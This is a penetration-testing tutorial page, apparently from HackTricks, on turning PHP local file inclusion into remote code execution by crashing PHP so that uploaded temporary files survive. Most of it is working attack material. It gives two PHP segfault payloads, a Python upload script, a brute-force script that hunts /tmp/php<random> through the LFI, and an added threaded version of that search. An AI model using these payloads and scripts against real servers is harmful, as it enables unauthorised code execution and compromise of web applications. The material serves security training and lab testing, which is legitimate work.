LFI2RCE via Segmentation Fault
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% endhint %}
According to the writeups https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/ (second part) and https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view, the following payloads caused a segmentation fault in PHP:
```php
// PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd");
// PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
```
Note that when a POST request carrying a file is sent, PHP creates a temporary file in /tmp/php<random> containing the uploaded content. This file is deleted automatically once the request has been processed.
If you have an LFI and manage to trigger a segmentation fault in PHP during that same request, the temporary file is never removed. You can then hunt for it through the LFI vulnerability until you find it and execute arbitrary code.
You can use the docker image https://hub.docker.com/r/easyengine/php7.0 for testing.
```python
# upload file with segmentation fault
import requests

# The LFI parameter "i" includes the PHP 7.0 segfault payload while the
# multipart upload is being processed, so /tmp/php<random> is never cleaned up.
url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
with open('la.php', 'rb') as f:
    files = {'file': f}
    try:
        response = requests.post(url, files=files)
    except requests.exceptions.ConnectionError:
        # the crashed worker often returns no response at all; that is expected
        pass
```
```python
# Search for the file (improve this with threads)
import itertools
import requests
import string

charset = string.ascii_letters + string.digits

host = "127.0.0.1"
port = 80
base_url = "http://%s:%d" % (host, port)

# PHP names upload temp files /tmp/phpXXXXXX (six random alphanumeric
# characters from mkstemp). "prefix" holds any characters already known,
# the remaining ones are brute-forced. The uploaded la.php must print the
# marker "spyd3r" so a successful include can be recognised.
prefix = ""
unknown = 6 - len(prefix)

def bruteforce(charset):
    for combo in itertools.product(charset, repeat=unknown):
        filename = prefix + "".join(combo)
        url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
        print(url)
        response = requests.get(url)
        if 'spyd3r' in response.text:
            print("[+] Include success! /tmp/php%s" % filename)
            return True
    return False

def main():
    bruteforce(charset)

if __name__ == "__main__":
    main()
```
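The script above probes candidates one at a time, and its own comment says to add threads. The following is an added example, not code from the page or the original writeups, of a threaded search with a pluggable probe so the logic can be exercised offline. It assumes (not stated on the page) that the temp name is six characters from the 62-character mkstemp alphabet, that the LFI parameter is `i`, and that the uploaded payload prints the marker `spyd3r`. A full blind search is 62^6 (about 5.7 × 10^10) candidates, which is not realistic over HTTP; the `known_prefix` argument is there for the case where part of the name has been recovered by other means, and `keyspace()` shows how many requests remain.

```python
import itertools
import string
from concurrent.futures import ThreadPoolExecutor

# Assumptions (not from the original page): upload temp files are
# /tmp/phpXXXXXX with six characters from this 62-char alphabet (glibc
# mkstemp), the LFI parameter is "i" and the payload prints "spyd3r".
CHARSET = string.ascii_letters + string.digits
MARKER = "spyd3r"
TMP_NAME_LEN = 6


def keyspace(known_prefix="", charset=CHARSET, name_len=TMP_NAME_LEN):
    """Number of candidate names left once known_prefix characters are fixed."""
    return len(charset) ** (name_len - len(known_prefix))


def candidates(known_prefix="", charset=CHARSET, name_len=TMP_NAME_LEN):
    """Yield every /tmp/php<name> suffix consistent with known_prefix."""
    for tail in itertools.product(charset, repeat=name_len - len(known_prefix)):
        yield known_prefix + "".join(tail)


def http_probe_factory(base_url, param="i", timeout=10):
    """Build a probe that includes /tmp/php<name> via the LFI and checks for MARKER."""
    import requests  # only needed for the live probe

    def probe(name):
        url = "%s/index.php?%s=/tmp/php%s" % (base_url, param, name)
        try:
            return MARKER in requests.get(url, timeout=timeout).text
        except requests.exceptions.RequestException:
            return False

    return probe


def find_tmp_file(probe, known_prefix="", workers=16, charset=CHARSET, batch=256):
    """Probe candidates in parallel batches; return the first name that hits, else None.

    probe(name) -> bool is called for every candidate; batching keeps the
    number of in-flight requests bounded and lets the search stop early.
    """
    names = candidates(known_prefix, charset)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        while True:
            chunk = list(itertools.islice(names, batch))
            if not chunk:
                return None
            for name, found in zip(chunk, pool.map(probe, chunk)):
                if found:
                    return name


def demo():
    # Constructed stand-in for a target (no HTTP): pretend /tmp/phpAb12Cd
    # survived the crash and the first four characters are already known,
    # leaving 62^2 = 3844 candidates to probe.
    surviving = {"Ab12Cd"}
    return find_tmp_file(lambda name: name in surviving, known_prefix="Ab12", workers=8)


if __name__ == "__main__":
    print("full blind keyspace:", keyspace())
    print("with 4 known chars:", keyspace("Ab12"))
    print("demo hit:", demo())
    # Live use (hypothetical target):
    # print(find_tmp_file(http_probe_factory("http://127.0.0.1:8008"), known_prefix=""))
```

Against a live target, swap the constructed probe in `demo()` for `http_probe_factory(base_url)`; the returned name is the suffix to append to `/tmp/php` in the final LFI request.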